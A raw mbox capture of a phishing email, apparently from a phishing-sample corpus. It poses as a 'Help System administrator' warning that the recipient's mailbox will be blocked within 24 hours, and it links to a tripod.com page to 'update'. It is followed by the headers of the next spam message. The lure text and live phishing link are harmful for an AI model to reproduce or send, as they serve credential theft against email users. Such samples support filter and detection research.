From: Shane Trudell <STrudell@co.jackson.mi.us>
To: "info@Staff.org" <info@Staff.org>
Subject: System Email Access
Thread-Topic: System Email Access
Thread-Index: AdS4fZBM3iDdQemZS6aLCfeO3sNpuQ==
Date: Wed, 30 Jan 2019 09:26:22 +0000
Message-ID: <1704FC1187CC804F80F0F9C21D8A032812C94460@orion.JacksonCounty.local>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
x-originating-ip: [5.62.58.234]
Content-Type: multipart/alternative;
	boundary="_000_1704FC1187CC804F80F0F9C21D8A032812C94460orionJacksonCou_"
MIME-Version: 1.0
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 21

--_000_1704FC1187CC804F80F0F9C21D8A032812C94460orionJacksonCou_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Dear Staff







Your mailbox will be blocked within 24hours To keep your Mail Box active. C=
lick Here<http://e-webr.tripod.com/> to update







Thank you,

Help System administrator.









-




--_000_1704FC1187CC804F80F0F9C21D8A032812C94460orionJacksonCou_
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html xmlns:v=3D"urn:schemas-microsoft-com:vml" xmlns:o=3D"urn:schemas-micr=
osoft-com:office:office" xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml" xmlns=3D"http:=
//www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dus-ascii"=
>
<meta name=3D"Generator" content=3D"Microsoft Word 14 (filtered medium)">
<style><!--
/* Font Definitions */
@font-face
	{font-family:Calibri;
	panose-1:2 15 5 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0in;
	margin-bottom:.0001pt;
	font-size:11.0pt;
	font-family:"Calibri","sans-serif";}
a:link, span.MsoHyperlink
	{mso-style-priority:99;
	color:blue;
	text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
	{mso-style-priority:99;
	color:purple;
	text-decoration:underline;}
p
	{mso-style-priority:99;
	mso-margin-top-alt:auto;
	margin-right:0in;
	mso-margin-bottom-alt:auto;
	margin-left:0in;
	font-size:12.0pt;
	font-family:"Times New Roman","serif";}
span.EmailStyle17
	{mso-style-type:personal-compose;
	font-family:"Calibri","sans-serif";
	color:windowtext;}
.MsoChpDefault
	{mso-style-type:export-only;
	font-family:"Calibri","sans-serif";}
@page WordSection1
	{size:8.5in 11.0in;
	margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
	{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext=3D"edit">
<o:idmap v:ext=3D"edit" data=3D"1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang=3D"EN-US" link=3D"blue" vlink=3D"purple">
<div class=3D"WordSection1">
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black">Dear=
 Staff<o:p></o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black">Your=
 mailbox will be blocked within 24hours To keep your Mail Box active.
<b><a href=3D"http://e-webr.tripod.com/" title=3D"http://e-webr.tripod.com/=
">Click Here</a></b> to update<o:p></o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black">Than=
k you,<o:p></o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black">Help=
 System administrator.<o:p></o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black"><o:p=
>&nbsp;</o:p></span></p>
<p style=3D"margin:0in;margin-bottom:.0001pt"><span style=3D"font-size:11.0=
pt;font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;color:black">-<o:=
p></o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-size:12.0pt;color:black"><o:p>&n=
bsp;</o:p></span></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
</body>
</html>

--_000_1704FC1187CC804F80F0F9C21D8A032812C94460orionJacksonCou_--

From jose@monkey.org Wed Jan 30 15:50:22 2019 +0000
Return-Path: postmaster@casdb.ro
Delivered-To: jose@monkey.org
X-FDA: 75110225484.33.walk48_3d6088acd6f05
X-Spam-Summary: 80,2,0,999780d23662a296,d41d8cd98f00b204,postmaster@casdb.ro,:,RULES_HIT:41:72:327:355:375:379:495:800:962:966:967:969:973:983:988:989:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1433:1434:1437:1513:1515:1516:1517:1521:1566:1571:1589:1593:1594:1714:1719:1730:1747:1777:1792:2194:2196:2198:2199:2200:2201:2393:2525:2527:2553:2560:2563:2682:2685:2693:2828:2859:2898:2900:2933:2937:2939:2942:2945:2947:2951:2954:3022:3041:3138:3139:3140:3141:3142:3867:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4385:4416:4552:5007:6261:6669:6671:6672:6674:6678:7688:8513:8583:8599:8603:8671:8957:9025:9388:9416:9871:10049:10346:11473:11657:11658:11914:12043:12438:12555:12658:12659:12660:12740:12895:12903:12955:12959:12986:13007:13008:13025:13439:13546:13551:14096:21080:21433:21436:21451:21483:21524:21627:21810:21819:30021:30022:30026:30054:30070:30090:30091,0,RBL:185.29.8.118:@casdb.ro:.lbl8.mailshell.net-62.14.145.150 64.201.201.201,CacheIP:none,Bayesian:0.5,0.
X-HE-Tag: walk48_3d6088acd6f05
X-Filterd-Recvd-Size: 21942
Received: from casdb.ro (unknown [185.29.8.118])
	by imf23.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 30 Jan 2019 15:50:21 +0000 (UTC)
Reply-To: E-mail Postmaster <postmaster@casdb.com>
